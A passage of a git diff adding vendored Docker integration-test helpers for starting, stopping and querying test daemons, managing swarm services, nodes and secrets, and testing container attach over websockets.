d.c.Logf("[%s] waiting for daemon to start", d.id) + if time.Now().Unix()-startTime > 5 { + // After 5 seconds, give up + return fmt.Errorf("[%s] Daemon exited and never started", d.id) + } + select { + case <-time.After(2 * time.Second): + return fmt.Errorf("[%s] timeout: daemon does not respond", d.id) + case <-tick: + clientConfig, err := d.getClientConfig() + if err != nil { + return err + } + + client := &http.Client{ + Transport: clientConfig.transport, + } + + req, err := http.NewRequest("GET", "/_ping", nil) + d.c.Assert(err, check.IsNil, check.Commentf("[%s] could not create new request", d.id)) + req.URL.Host = clientConfig.addr + req.URL.Scheme = clientConfig.scheme + resp, err := client.Do(req) + if err != nil { + continue + } + if resp.StatusCode != http.StatusOK { + d.c.Logf("[%s] received status != 200 OK: %s", d.id, resp.Status) + } + d.c.Logf("[%s] daemon started", d.id) + d.root, err = d.queryRootDir() + if err != nil { + return fmt.Errorf("[%s] error querying daemon for root directory: %v", d.id, err) + } + return nil + case <-d.wait: + return fmt.Errorf("[%s] Daemon exited during startup", d.id) + } + } +} + +// StartWithBusybox will first start the daemon with Daemon.Start() +// then save the busybox image from the main daemon and load it into this Daemon instance. +func (d *Daemon) StartWithBusybox(arg ...string) error { + if err := d.Start(arg...); err != nil { + return err + } + return d.LoadBusybox() +} + +// Kill will send a SIGKILL to the daemon +func (d *Daemon) Kill() error { + if d.cmd == nil || d.wait == nil { + return errors.New("daemon not started") + } + + defer func() { + d.logFile.Close() + d.cmd = nil + }() + + if err := d.cmd.Process.Kill(); err != nil { + d.c.Logf("Could not kill daemon: %v", err) + return err + } + + if err := os.Remove(fmt.Sprintf("%s/docker.pid", d.folder)); err != nil { + return err + } + + return nil +} + +// DumpStackAndQuit sends SIGQUIT to the daemon, which triggers it to dump its +// stack to its log file and exit +// This is used primarily for gathering debug information on test timeout +func (d *Daemon) DumpStackAndQuit() { + if d.cmd == nil || d.cmd.Process == nil { + return + } + signalDaemonDump(d.cmd.Process.Pid) +} + +// Stop will send a SIGINT every second and wait for the daemon to stop. +// If it timeouts, a SIGKILL is sent. +// Stop will not delete the daemon directory. If a purged daemon is needed, +// instantiate a new one with NewDaemon. +func (d *Daemon) Stop() error { + if d.cmd == nil || d.wait == nil { + return errors.New("daemon not started") + } + + defer func() { + d.logFile.Close() + d.cmd = nil + }() + + i := 1 + tick := time.Tick(time.Second) + + if err := d.cmd.Process.Signal(os.Interrupt); err != nil { + return fmt.Errorf("could not send signal: %v", err) + } +out1: + for { + select { + case err := <-d.wait: + return err + case <-time.After(20 * time.Second): + // time for stopping jobs and run onShutdown hooks + d.c.Logf("timeout: %v", d.id) + break out1 + } + } + +out2: + for { + select { + case err := <-d.wait: + return err + case <-tick: + i++ + if i > 5 { + d.c.Logf("tried to interrupt daemon for %d times, now try to kill it", i) + break out2 + } + d.c.Logf("Attempt #%d: daemon is still running with pid %d", i, d.cmd.Process.Pid) + if err := d.cmd.Process.Signal(os.Interrupt); err != nil { + return fmt.Errorf("could not send signal: %v", err) + } + } + } + + if err := d.cmd.Process.Kill(); err != nil { + d.c.Logf("Could not kill daemon: %v", err) + return err + } + + if err := os.Remove(fmt.Sprintf("%s/docker.pid", d.folder)); err != nil { + return err + } + + return nil +} + +// Restart will restart the daemon by first stopping it and then starting it. +func (d *Daemon) Restart(arg ...string) error { + d.Stop() + // in the case of tests running a user namespace-enabled daemon, we have resolved + // d.root to be the actual final path of the graph dir after the "uid.gid" of + // remapped root is added--we need to subtract it from the path before calling + // start or else we will continue making subdirectories rather than truly restarting + // with the same location/root: + if root := os.Getenv("DOCKER_REMAP_ROOT"); root != "" { + d.root = filepath.Dir(d.root) + } + return d.Start(arg...) +} + +// LoadBusybox will load the stored busybox into a newly started daemon +func (d *Daemon) LoadBusybox() error { + bb := filepath.Join(d.folder, "busybox.tar") + if _, err := os.Stat(bb); err != nil { + if !os.IsNotExist(err) { + return fmt.Errorf("unexpected error on busybox.tar stat: %v", err) + } + // saving busybox image from main daemon + if out, err := exec.Command(dockerBinary, "save", "--output", bb, "busybox:latest").CombinedOutput(); err != nil { + imagesOut, _ := exec.Command(dockerBinary, "images", "--format", "{{ .Repository }}:{{ .Tag }}").CombinedOutput() + return fmt.Errorf("could not save busybox image: %s\n%s", string(out), strings.TrimSpace(string(imagesOut))) + } + } + // loading busybox image to this daemon + if out, err := d.Cmd("load", "--input", bb); err != nil { + return fmt.Errorf("could not load busybox image: %s", out) + } + if err := os.Remove(bb); err != nil { + d.c.Logf("could not remove %s: %v", bb, err) + } + return nil +} + +func (d *Daemon) queryRootDir() (string, error) { + // update daemon root by asking /info endpoint (to support user + // namespaced daemon with root remapped uid.gid directory) + clientConfig, err := d.getClientConfig() + if err != nil { + return "", err + } + + client := &http.Client{ + Transport: clientConfig.transport, + } + + req, err := http.NewRequest("GET", "/info", nil) + if err != nil { + return "", err + } + req.Header.Set("Content-Type", "application/json") + req.URL.Host = clientConfig.addr + req.URL.Scheme = clientConfig.scheme + + resp, err := client.Do(req) + if err != nil { + return "", err + } + body := ioutils.NewReadCloserWrapper(resp.Body, func() error { + return resp.Body.Close() + }) + + type Info struct { + DockerRootDir string + } + var b []byte + var i Info + b, err = readBody(body) + if err == nil && resp.StatusCode == http.StatusOK { + // read the docker root dir + if err = json.Unmarshal(b, &i); err == nil { + return i.DockerRootDir, nil + } + } + return "", err +} + +func (d *Daemon) sock() string { + return fmt.Sprintf("unix://" + d.sockPath()) +} + +func (d *Daemon) sockPath() string { + return filepath.Join(daemonSockRoot, d.id+".sock") +} + +func (d *Daemon) waitRun(contID string) error { + args := []string{"--host", d.sock()} + return waitInspectWithArgs(contID, "{{.State.Running}}", "true", 10*time.Second, args...) +} + +func (d *Daemon) getBaseDeviceSize(c *check.C) int64 { + infoCmdOutput, _, err := runCommandPipelineWithOutput( + exec.Command(dockerBinary, "-H", d.sock(), "info"), + exec.Command("grep", "Base Device Size"), + ) + c.Assert(err, checker.IsNil) + basesizeSlice := strings.Split(infoCmdOutput, ":") + basesize := strings.Trim(basesizeSlice[1], " ") + basesize = strings.Trim(basesize, "\n")[:len(basesize)-3] + basesizeFloat, err := strconv.ParseFloat(strings.Trim(basesize, " "), 64) + c.Assert(err, checker.IsNil) + basesizeBytes := int64(basesizeFloat) * (1024 * 1024 * 1024) + return basesizeBytes +} + +// Cmd will execute a docker CLI command against this Daemon. +// Example: d.Cmd("version") will run docker -H unix://path/to/unix.sock version +func (d *Daemon) Cmd(args ...string) (string, error) { + b, err := d.command(args...).CombinedOutput() + return string(b), err +} + +func (d *Daemon) command(args ...string) *exec.Cmd { + return exec.Command(dockerBinary, d.prependHostArg(args)...) +} + +func (d *Daemon) prependHostArg(args []string) []string { + for _, arg := range args { + if arg == "--host" || arg == "-H" { + return args + } + } + return append([]string{"--host", d.sock()}, args...) +} + +// SockRequest executes a socket request on a daemon and returns statuscode and output. +func (d *Daemon) SockRequest(method, endpoint string, data interface{}) (int, []byte, error) { + jsonData := bytes.NewBuffer(nil) + if err := json.NewEncoder(jsonData).Encode(data); err != nil { + return -1, nil, err + } + + res, body, err := d.SockRequestRaw(method, endpoint, jsonData, "application/json") + if err != nil { + return -1, nil, err + } + b, err := readBody(body) + return res.StatusCode, b, err +} + +// SockRequestRaw executes a socket request on a daemon and returns an http +// response and a reader for the output data. +func (d *Daemon) SockRequestRaw(method, endpoint string, data io.Reader, ct string) (*http.Response, io.ReadCloser, error) { + return sockRequestRawToDaemon(method, endpoint, data, ct, d.sock()) +} + +// LogFileName returns the path the the daemon's log file +func (d *Daemon) LogFileName() string { + return d.logFile.Name() +} + +func (d *Daemon) getIDByName(name string) (string, error) { + return d.inspectFieldWithError(name, "Id") +} + +func (d *Daemon) activeContainers() (ids []string) { + out, _ := d.Cmd("ps", "-q") + for _, id := range strings.Split(out, "\n") { + if id = strings.TrimSpace(id); id != "" { + ids = append(ids, id) + } + } + return +} + +func (d *Daemon) inspectFilter(name, filter string) (string, error) { + format := fmt.Sprintf("{{%s}}", filter) + out, err := d.Cmd("inspect", "-f", format, name) + if err != nil { + return "", fmt.Errorf("failed to inspect %s: %s", name, out) + } + return strings.TrimSpace(out), nil +} + +func (d *Daemon) inspectFieldWithError(name, field string) (string, error) { + return d.inspectFilter(name, fmt.Sprintf(".%s", field)) +} + +func (d *Daemon) findContainerIP(id string) string { + out, err := d.Cmd("inspect", fmt.Sprintf("--format='{{ .NetworkSettings.Networks.bridge.IPAddress }}'"), id) + if err != nil { + d.c.Log(err) + } + return strings.Trim(out, " \r\n'") +} + +func (d *Daemon) buildImageWithOut(name, dockerfile string, useCache bool, buildFlags ...string) (string, int, error) { + buildCmd := buildImageCmdWithHost(name, dockerfile, d.sock(), useCache, buildFlags...) + return runCommandWithOutput(buildCmd) +} + +func (d *Daemon) checkActiveContainerCount(c *check.C) (interface{}, check.CommentInterface) { + out, err := d.Cmd("ps", "-q") + c.Assert(err, checker.IsNil) + if len(strings.TrimSpace(out)) == 0 { + return 0, nil + } + return len(strings.Split(strings.TrimSpace(out), "\n")), check.Commentf("output: %q", string(out)) +} + +func (d *Daemon) reloadConfig() error { + if d.cmd == nil || d.cmd.Process == nil { + return fmt.Errorf("daemon is not running") + } + + errCh := make(chan error) + started := make(chan struct{}) + go func() { + _, body, err := sockRequestRawToDaemon("GET", "/events", nil, "", d.sock()) + close(started) + if err != nil { + errCh <- err + } + defer body.Close() + dec := json.NewDecoder(body) + for { + var e events.Message + if err := dec.Decode(&e); err != nil { + errCh <- err + return + } + if e.Type != events.DaemonEventType { + continue + } + if e.Action != "reload" { + continue + } + close(errCh) // notify that we are done + return + } + }() + + <-started + if err := signalDaemonReload(d.cmd.Process.Pid); err != nil { + return fmt.Errorf("error signaling daemon reload: %v", err) + } + select { + case err := <-errCh: + if err != nil { + return fmt.Errorf("error waiting for daemon reload event: %v", err) + } + case <-time.After(30 * time.Second): + return fmt.Errorf("timeout waiting for daemon reload event") + } + return nil +} diff --git a/vendor/github.com/docker/docker/integration-cli/daemon_swarm.go b/vendor/github.com/docker/docker/integration-cli/daemon_swarm.go new file mode 100644 index 0000000000..199bce0e7b --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/daemon_swarm.go @@ -0,0 +1,419 @@ +package main + +import ( + "encoding/json" + "fmt" + "net/http" + "strings" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +// SwarmDaemon is a test daemon with helpers for participating in a swarm. +type SwarmDaemon struct { + *Daemon + swarm.Info + port int + listenAddr string +} + +// Init initializes a new swarm cluster. +func (d *SwarmDaemon) Init(req swarm.InitRequest) error { + if req.ListenAddr == "" { + req.ListenAddr = d.listenAddr + } + status, out, err := d.SockRequest("POST", "/swarm/init", req) + if status != http.StatusOK { + return fmt.Errorf("initializing swarm: invalid statuscode %v, %q", status, out) + } + if err != nil { + return fmt.Errorf("initializing swarm: %v", err) + } + info, err := d.info() + if err != nil { + return err + } + d.Info = info + return nil +} + +// Join joins a daemon to an existing cluster. +func (d *SwarmDaemon) Join(req swarm.JoinRequest) error { + if req.ListenAddr == "" { + req.ListenAddr = d.listenAddr + } + status, out, err := d.SockRequest("POST", "/swarm/join", req) + if status != http.StatusOK { + return fmt.Errorf("joining swarm: invalid statuscode %v, %q", status, out) + } + if err != nil { + return fmt.Errorf("joining swarm: %v", err) + } + info, err := d.info() + if err != nil { + return err + } + d.Info = info + return nil +} + +// Leave forces daemon to leave current cluster. +func (d *SwarmDaemon) Leave(force bool) error { + url := "/swarm/leave" + if force { + url += "?force=1" + } + status, out, err := d.SockRequest("POST", url, nil) + if status != http.StatusOK { + return fmt.Errorf("leaving swarm: invalid statuscode %v, %q", status, out) + } + if err != nil { + err = fmt.Errorf("leaving swarm: %v", err) + } + return err +} + +func (d *SwarmDaemon) info() (swarm.Info, error) { + var info struct { + Swarm swarm.Info + } + status, dt, err := d.SockRequest("GET", "/info", nil) + if status != http.StatusOK { + return info.Swarm, fmt.Errorf("get swarm info: invalid statuscode %v", status) + } + if err != nil { + return info.Swarm, fmt.Errorf("get swarm info: %v", err) + } + if err := json.Unmarshal(dt, &info); err != nil { + return info.Swarm, err + } + return info.Swarm, nil +} + +type serviceConstructor func(*swarm.Service) +type nodeConstructor func(*swarm.Node) +type specConstructor func(*swarm.Spec) + +func (d *SwarmDaemon) createService(c *check.C, f ...serviceConstructor) string { + var service swarm.Service + for _, fn := range f { + fn(&service) + } + status, out, err := d.SockRequest("POST", "/services/create", service.Spec) + + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusCreated, check.Commentf("output: %q", string(out))) + + var scr types.ServiceCreateResponse + c.Assert(json.Unmarshal(out, &scr), checker.IsNil) + return scr.ID +} + +func (d *SwarmDaemon) getService(c *check.C, id string) *swarm.Service { + var service swarm.Service + status, out, err := d.SockRequest("GET", "/services/"+id, nil) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) + c.Assert(json.Unmarshal(out, &service), checker.IsNil) + return &service +} + +func (d *SwarmDaemon) getServiceTasks(c *check.C, service string) []swarm.Task { + var tasks []swarm.Task + + filterArgs := filters.NewArgs() + filterArgs.Add("desired-state", "running") + filterArgs.Add("service", service) + filters, err := filters.ToParam(filterArgs) + c.Assert(err, checker.IsNil) + + status, out, err := d.SockRequest("GET", "/tasks?filters="+filters, nil) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) + c.Assert(json.Unmarshal(out, &tasks), checker.IsNil) + return tasks +} + +func (d *SwarmDaemon) checkServiceTasksInState(service string, state swarm.TaskState, message string) func(*check.C) (interface{}, check.CommentInterface) { + return func(c *check.C) (interface{}, check.CommentInterface) { + tasks := d.getServiceTasks(c, service) + var count int + for _, task := range tasks { + if task.Status.State == state { + if message == "" || strings.Contains(task.Status.Message, message) { + count++ + } + } + } + return count, nil + } +} + +func (d *SwarmDaemon) checkServiceRunningTasks(service string) func(*check.C) (interface{}, check.CommentInterface) { + return d.checkServiceTasksInState(service, swarm.TaskStateRunning, "") +} + +func (d *SwarmDaemon) checkServiceUpdateState(service string) func(*check.C) (interface{}, check.CommentInterface) { + return func(c *check.C) (interface{}, check.CommentInterface) { + service := d.getService(c, service) + return service.UpdateStatus.State, nil + } +} + +func (d *SwarmDaemon) checkServiceTasks(service string) func(*check.C) (interface{}, check.CommentInterface) { + return func(c *check.C) (interface{}, check.CommentInterface) { + tasks := d.getServiceTasks(c, service) + return len(tasks), nil + } +} + +func (d *SwarmDaemon) checkRunningTaskImages(c *check.C) (interface{}, check.CommentInterface) { + var tasks []swarm.Task + + filterArgs := filters.NewArgs() + filterArgs.Add("desired-state", "running") + filters, err := filters.ToParam(filterArgs) + c.Assert(err, checker.IsNil) + + status, out, err := d.SockRequest("GET", "/tasks?filters="+filters, nil) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) + c.Assert(json.Unmarshal(out, &tasks), checker.IsNil) + + result := make(map[string]int) + for _, task := range tasks { + if task.Status.State == swarm.TaskStateRunning { + result[task.Spec.ContainerSpec.Image]++ + } + } + return result, nil +} + +func (d *SwarmDaemon) checkNodeReadyCount(c *check.C) (interface{}, check.CommentInterface) { + nodes := d.listNodes(c) + var readyCount int + for _, node := range nodes { + if node.Status.State == swarm.NodeStateReady { + readyCount++ + } + } + return readyCount, nil +} + +func (d *SwarmDaemon) getTask(c *check.C, id string) swarm.Task { + var task swarm.Task + + status, out, err := d.SockRequest("GET", "/tasks/"+id, nil) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) + c.Assert(json.Unmarshal(out, &task), checker.IsNil) + return task +} + +func (d *SwarmDaemon) updateService(c *check.C, service *swarm.Service, f ...serviceConstructor) { + for _, fn := range f { + fn(service) + } + url := fmt.Sprintf("/services/%s/update?version=%d", service.ID, service.Version.Index) + status, out, err := d.SockRequest("POST", url, service.Spec) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) +} + +func (d *SwarmDaemon) removeService(c *check.C, id string) { + status, out, err := d.SockRequest("DELETE", "/services/"+id, nil) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) +} + +func (d *SwarmDaemon) getNode(c *check.C, id string) *swarm.Node { + var node swarm.Node + status, out, err := d.SockRequest("GET", "/nodes/"+id, nil) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) + c.Assert(json.Unmarshal(out, &node), checker.IsNil) + c.Assert(node.ID, checker.Equals, id) + return &node +} + +func (d *SwarmDaemon) removeNode(c *check.C, id string, force bool) { + url := "/nodes/" + id + if force { + url += "?force=1" + } + + status, out, err := d.SockRequest("DELETE", url, nil) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) +} + +func (d *SwarmDaemon) updateNode(c *check.C, id string, f ...nodeConstructor) { + for i := 0; ; i++ { + node := d.getNode(c, id) + for _, fn := range f { + fn(node) + } + url := fmt.Sprintf("/nodes/%s/update?version=%d", node.ID, node.Version.Index) + status, out, err := d.SockRequest("POST", url, node.Spec) + if i < 10 && strings.Contains(string(out), "update out of sequence") { + time.Sleep(100 * time.Millisecond) + continue + } + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) + return + } +} + +func (d *SwarmDaemon) listNodes(c *check.C) []swarm.Node { + status, out, err := d.SockRequest("GET", "/nodes", nil) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) + + nodes := []swarm.Node{} + c.Assert(json.Unmarshal(out, &nodes), checker.IsNil) + return nodes +} + +func (d *SwarmDaemon) listServices(c *check.C) []swarm.Service { + status, out, err := d.SockRequest("GET", "/services", nil) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) + + services := []swarm.Service{} + c.Assert(json.Unmarshal(out, &services), checker.IsNil) + return services +} + +func (d *SwarmDaemon) createSecret(c *check.C, secretSpec swarm.SecretSpec) string { + status, out, err := d.SockRequest("POST", "/secrets/create", secretSpec) + + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusCreated, check.Commentf("output: %q", string(out))) + + var scr types.SecretCreateResponse + c.Assert(json.Unmarshal(out, &scr), checker.IsNil) + return scr.ID +} + +func (d *SwarmDaemon) listSecrets(c *check.C) []swarm.Secret { + status, out, err := d.SockRequest("GET", "/secrets", nil) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) + + secrets := []swarm.Secret{} + c.Assert(json.Unmarshal(out, &secrets), checker.IsNil) + return secrets +} + +func (d *SwarmDaemon) getSecret(c *check.C, id string) *swarm.Secret { + var secret swarm.Secret + status, out, err := d.SockRequest("GET", "/secrets/"+id, nil) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) + c.Assert(json.Unmarshal(out, &secret), checker.IsNil) + return &secret +} + +func (d *SwarmDaemon) deleteSecret(c *check.C, id string) { + status, out, err := d.SockRequest("DELETE", "/secrets/"+id, nil) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusNoContent, check.Commentf("output: %q", string(out))) +} + +func (d *SwarmDaemon) getSwarm(c *check.C) swarm.Swarm { + var sw swarm.Swarm + status, out, err := d.SockRequest("GET", "/swarm", nil) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) + c.Assert(json.Unmarshal(out, &sw), checker.IsNil) + return sw +} + +func (d *SwarmDaemon) updateSwarm(c *check.C, f ...specConstructor) { + sw := d.getSwarm(c) + for _, fn := range f { + fn(&sw.Spec) + } + url := fmt.Sprintf("/swarm/update?version=%d", sw.Version.Index) + status, out, err := d.SockRequest("POST", url, sw.Spec) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) +} + +func (d *SwarmDaemon) rotateTokens(c *check.C) { + var sw swarm.Swarm + status, out, err := d.SockRequest("GET", "/swarm", nil) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) + c.Assert(json.Unmarshal(out, &sw), checker.IsNil) + + url := fmt.Sprintf("/swarm/update?version=%d&rotateWorkerToken=true&rotateManagerToken=true", sw.Version.Index) + status, out, err = d.SockRequest("POST", url, sw.Spec) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) +} + +func (d *SwarmDaemon) joinTokens(c *check.C) swarm.JoinTokens { + var sw swarm.Swarm + status, out, err := d.SockRequest("GET", "/swarm", nil) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) + c.Assert(json.Unmarshal(out, &sw), checker.IsNil) + return sw.JoinTokens +} + +func (d *SwarmDaemon) checkLocalNodeState(c *check.C) (interface{}, check.CommentInterface) { + info, err := d.info() + c.Assert(err, checker.IsNil) + return info.LocalNodeState, nil +} + +func (d *SwarmDaemon) checkControlAvailable(c *check.C) (interface{}, check.CommentInterface) { + info, err := d.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + return info.ControlAvailable, nil +} + +func (d *SwarmDaemon) checkLeader(c *check.C) (interface{}, check.CommentInterface) { + errList := check.Commentf("could not get node list") + status, out, err := d.SockRequest("GET", "/nodes", nil) + if err != nil { + return err, errList + } + if status != http.StatusOK { + return fmt.Errorf("expected http status OK, got: %d", status), errList + } + + var ls []swarm.Node + if err := json.Unmarshal(out, &ls); err != nil { + return err, errList + } + + for _, node := range ls { + if node.ManagerStatus != nil && node.ManagerStatus.Leader { + return nil, nil + } + } + return fmt.Errorf("no leader"), check.Commentf("could not find leader") +} + +func (d *SwarmDaemon) cmdRetryOutOfSequence(args ...string) (string, error) { + for i := 0; ; i++ { + out, err := d.Cmd(args...) + if err != nil { + if strings.Contains(out, "update out of sequence") { + if i < 10 { + continue + } + } + } + return out, err + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/daemon_swarm_hack.go b/vendor/github.com/docker/docker/integration-cli/daemon_swarm_hack.go new file mode 100644 index 0000000000..0cea901420 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/daemon_swarm_hack.go @@ -0,0 +1,20 @@ +package main + +import "github.com/go-check/check" + +func (s *DockerSwarmSuite) getDaemon(c *check.C, nodeID string) *SwarmDaemon { + s.daemonsLock.Lock() + defer s.daemonsLock.Unlock() + for _, d := range s.daemons { + if d.NodeID == nodeID { + return d + } + } + c.Fatalf("could not find node with id: %s", nodeID) + return nil +} + +// nodeCmd executes a command on a given node via the normal docker socket +func (s *DockerSwarmSuite) nodeCmd(c *check.C, id string, args ...string) (string, error) { + return s.getDaemon(c, id).Cmd(args...) +} diff --git a/vendor/github.com/docker/docker/integration-cli/daemon_unix.go b/vendor/github.com/docker/docker/integration-cli/daemon_unix.go new file mode 100644 index 0000000000..6ca7daf21c --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/daemon_unix.go @@ -0,0 +1,35 @@ +// +build !windows + +package main + +import ( + "os" + "path/filepath" + "syscall" + + "github.com/go-check/check" +) + +func cleanupExecRoot(c *check.C, execRoot string) { + // Cleanup network namespaces in the exec root of this + // daemon because this exec root is specific to this + // daemon instance and has no chance of getting + // cleaned up when a new daemon is instantiated with a + // new exec root. + netnsPath := filepath.Join(execRoot, "netns") + filepath.Walk(netnsPath, func(path string, info os.FileInfo, err error) error { + if err := syscall.Unmount(path, syscall.MNT_FORCE); err != nil { + c.Logf("unmount of %s failed: %v", path, err) + } + os.Remove(path) + return nil + }) +} + +func signalDaemonDump(pid int) { + syscall.Kill(pid, syscall.SIGQUIT) +} + +func signalDaemonReload(pid int) error { + return syscall.Kill(pid, syscall.SIGHUP) +} diff --git a/vendor/github.com/docker/docker/integration-cli/daemon_windows.go b/vendor/github.com/docker/docker/integration-cli/daemon_windows.go new file mode 100644 index 0000000000..885b703b33 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/daemon_windows.go @@ -0,0 +1,53 @@ +package main + +import ( + "fmt" + "strconv" + "syscall" + "unsafe" + + "github.com/go-check/check" + "golang.org/x/sys/windows" +) + +func openEvent(desiredAccess uint32, inheritHandle bool, name string, proc *windows.LazyProc) (handle syscall.Handle, err error) { + namep, _ := syscall.UTF16PtrFromString(name) + var _p2 uint32 + if inheritHandle { + _p2 = 1 + } + r0, _, e1 := proc.Call(uintptr(desiredAccess), uintptr(_p2), uintptr(unsafe.Pointer(namep))) + handle = syscall.Handle(r0) + if handle == syscall.InvalidHandle { + err = e1 + } + return +} + +func pulseEvent(handle syscall.Handle, proc *windows.LazyProc) (err error) { + r0, _, _ := proc.Call(uintptr(handle)) + if r0 != 0 { + err = syscall.Errno(r0) + } + return +} + +func signalDaemonDump(pid int) { + modkernel32 := windows.NewLazySystemDLL("kernel32.dll") + procOpenEvent := modkernel32.NewProc("OpenEventW") + procPulseEvent := modkernel32.NewProc("PulseEvent") + + ev := "Global\\docker-daemon-" + strconv.Itoa(pid) + h2, _ := openEvent(0x0002, false, ev, procOpenEvent) + if h2 == 0 { + return + } + pulseEvent(h2, procPulseEvent) +} + +func signalDaemonReload(pid int) error { + return fmt.Errorf("daemon reload not supported") +} + +func cleanupExecRoot(c *check.C, execRoot string) { +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_attach_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_attach_test.go new file mode 100644 index 0000000000..d43bf3ab0e --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_attach_test.go @@ -0,0 +1,210 @@ +package main + +import ( + "bufio" + "bytes" + "context" + "io" + "net" + "net/http" + "strings" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/client" + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/pkg/stdcopy" + "github.com/go-check/check" + "golang.org/x/net/websocket" +) + +func (s *DockerSuite) TestGetContainersAttachWebsocket(c *check.C) { + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-dit", "busybox", "cat") + + rwc, err := sockConn(time.Duration(10*time.Second), "") + c.Assert(err, checker.IsNil) + + cleanedContainerID := strings.TrimSpace(out) + config, err := websocket.NewConfig( + "/containers/"+cleanedContainerID+"/attach/ws?stream=1&stdin=1&stdout=1&stderr=1", + "http://localhost", + ) + c.Assert(err, checker.IsNil) + + ws, err := websocket.NewClient(config, rwc) + c.Assert(err, checker.IsNil) + defer ws.Close() + + expected := []byte("hello") + actual := make([]byte, len(expected)) + + outChan := make(chan error) + go func() { + _, err := io.ReadFull(ws, actual) + outChan <- err + close(outChan) + }() + + inChan := make(chan error) + go func() { + _, err := ws.Write(expected) + inChan <- err + close(inChan) + }() + + select { + case err := <-inChan: + c.Assert(err, checker.IsNil) + case <-time.After(5 * time.Second): + c.Fatal("Timeout writing to ws") + } + + select { + case err := <-outChan: + c.Assert(err, checker.IsNil) + case <-time.After(5 * time.Second): + c.Fatal("Timeout reading from ws") + } + + c.Assert(actual, checker.DeepEquals, expected, check.Commentf("Websocket didn't return the expected data")) +} + +// regression gh14320 +func (s *DockerSuite) TestPostContainersAttachContainerNotFound(c *check.C) { + req, client, err := newRequestClient("POST", "/containers/doesnotexist/attach", nil, "", "") + c.Assert(err, checker.IsNil) + + resp, err := client.Do(req) + // connection will shutdown, err should be "persistent connection closed" + c.Assert(err, checker.NotNil) // Server shutdown connection + + body, err := readBody(resp.Body) + c.Assert(err, checker.IsNil) + c.Assert(resp.StatusCode, checker.Equals, http.StatusNotFound) + expected := "No such container: doesnotexist\r\n" + c.Assert(string(body), checker.Equals, expected) +} + +func (s *DockerSuite) TestGetContainersWsAttachContainerNotFound(c *check.C) { + status, body, err := sockRequest("GET", "/containers/doesnotexist/attach/ws", nil) + c.Assert(status, checker.Equals, http.StatusNotFound) + c.Assert(err, checker.IsNil) + expected := "No such container: doesnotexist" + c.Assert(getErrorMessage(c, body), checker.Contains, expected) +} + +func (s *DockerSuite) TestPostContainersAttach(c *check.C) { + testRequires(c, DaemonIsLinux) + + expectSuccess := func(conn net.Conn, br *bufio.Reader, stream string, tty bool) { + defer conn.Close() + expected := []byte("success") + _, err := conn.Write(expected) + c.Assert(err, checker.IsNil) + + conn.SetReadDeadline(time.Now().Add(time.Second)) + lenHeader := 0 + if !tty { + lenHeader = 8 + } + actual := make([]byte, len(expected)+lenHeader) + _, err = io.ReadFull(br, actual) + c.Assert(err, checker.IsNil) + if !tty { + fdMap := map[string]byte{ + "stdin": 0, + "stdout": 1, + "stderr": 2, + } + c.Assert(actual[0], checker.Equals, fdMap[stream]) + } + c.Assert(actual[lenHeader:], checker.DeepEquals, expected, 